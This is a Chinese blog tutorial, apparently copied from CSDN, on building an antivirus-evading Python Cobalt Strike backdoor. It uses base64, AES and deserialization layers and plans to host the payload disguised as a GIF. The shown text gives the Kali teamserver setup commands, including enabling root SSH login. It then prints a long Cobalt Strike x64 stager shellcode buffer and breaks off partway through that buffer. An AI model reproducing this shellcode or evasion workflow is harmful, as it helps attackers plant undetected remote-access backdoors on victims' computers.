码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Python反序列化免杀上线CS:两次编码绕过


    目录

    • 环境
    • 1、整体过程
    • 2、环境CobaltStrike准备
      • 1、kali安装CobaltStrike
      • 2、Windows启动cs连接kali
    • 3、使用cs生成payload
    • 4、进行base64编码并且生成http服务器
      • 1、把生成的buf内容base64编码
      • 2、使用python生成http服务器并指定端口3333
      • 3、将pl.txt中的代码先进行序列化然后再进行base64编码
    • 5、二次编码后的代码再进行aes加密
    • 6、aes加密后再进行解密然后再序列化一次后再base64加密,再对加密后的代码反序列化
    • 7、新建文件转换为gif,并且上传到图片网站得到木马地址。
    • 8、运行查看cs结果

    环境

    Windows:win10
    kali:linux-2022.2

    1、整体过程

    本次免杀通过cs生成python后门—将payloadbase64加密—放入服务器下【网上方便被人下载】。
    为了避免杀死,我们进行了两次编码

    编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次
    【解密之前要进行解码】 =》得到base64编码 aes解密【建议使用rc4,因为ase加密有名容易被发现】

    2、环境CobaltStrike准备

    1、kali安装CobaltStrike

    将CobaltStrike包上传至kali,但是要注意kali是默认拒绝了ssh的密码登录。如此就无法上传文件
    如果当弹出服务拒绝了就要去/etc/ssh/sshd_config文档修改。
    参考的问题解决博客

    vim /etc/ssh/sshd_config
    
    • 1

    在这里插入图片描述

    把文档的PermitRootLogin行注释掉,后面添加PermitRootLogin yes

    上传包
    在这里插入图片描述
    并且进入CobaltStrike_4.0目录,为"agscript"、“c2lint”、"peclone"和"teamserver"文件赋予执行权限。

    #进入cs目录,这里我改了文件名原资源包不是这个文件名
    cd cobaltstrike4.0/
    #查看
    ls -l
    #赋予权限
    chmod a+x agscript
    chmod a+x c2lint
    chmod a+x peclone
    chmod a+x teamserver
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10

    然后kali连接并且监听。

    ./teamserver 192.168.171.152 kali
    
    • 1

    在这里插入图片描述

    2、Windows启动cs连接kali

    HOST为kali的IP地址
    Port:为./teamserver语句输入后给出的端口
    user:随便输入
    Password:为./teamserver语句输入的密码即我给的kali
    在这里插入图片描述

    3、使用cs生成payload

    使用cs生成payload
    在这里插入图片描述
    在这里插入图片描述
    查看生产的编码
    在这里插入图片描述

    # length: 894 bytes
    buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x27\x23\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x70\x51\x56\x46\x00\x12\x50\x39\xd1\xa5\x3f\x0b\xd0\x98\x82\xb0\x08\xa2\xcc\x9b\x2b\xc5\x7a\xc7\xb4\x29\x29\x2d\xc3\xa6\xe6\x81\xd1\xa0\xc8\x9b\x1e\x9d\x00\x03\x02\x8b\x7a\xd1\x09\xe2\x21\xae\xca\xb8\x8d\x2e\x3c\xe0\xaf\xc9\xed\xce\xd9\x83\x7f\x42\xbd\xe8\xbc\x69\x58\x05\x2b\x38\xfe\x8b\x35\x86\x9a\xb8\x63\x55\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\
    • 1
  • 相关阅读:
    协程的创建
    Python爬虫入门基础学习(二)
    FL Studio All Plugins Edition2024中文完整版Win/Mac
    设计模式(简要,应付软考)
    七夕了,谁说我们程序员不懂浪漫!!!
    电子元器件包装类型
    day36(http协议 服务器软件的使用 PHP的简单了解 前后端交互 ajax 同步和异步)
    图文结合,手把手教你ubuntu18-live-server-amd64服务器版的安装、配置静态ip以及换源
    运筹说 第72期 | 算法介绍之动态规划(二)
    弘辽科技:淘宝什么情况下需要提升销量?店铺怎么提升销量?
  • 原文地址:https://blog.csdn.net/Miracle_ze/article/details/126447615
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号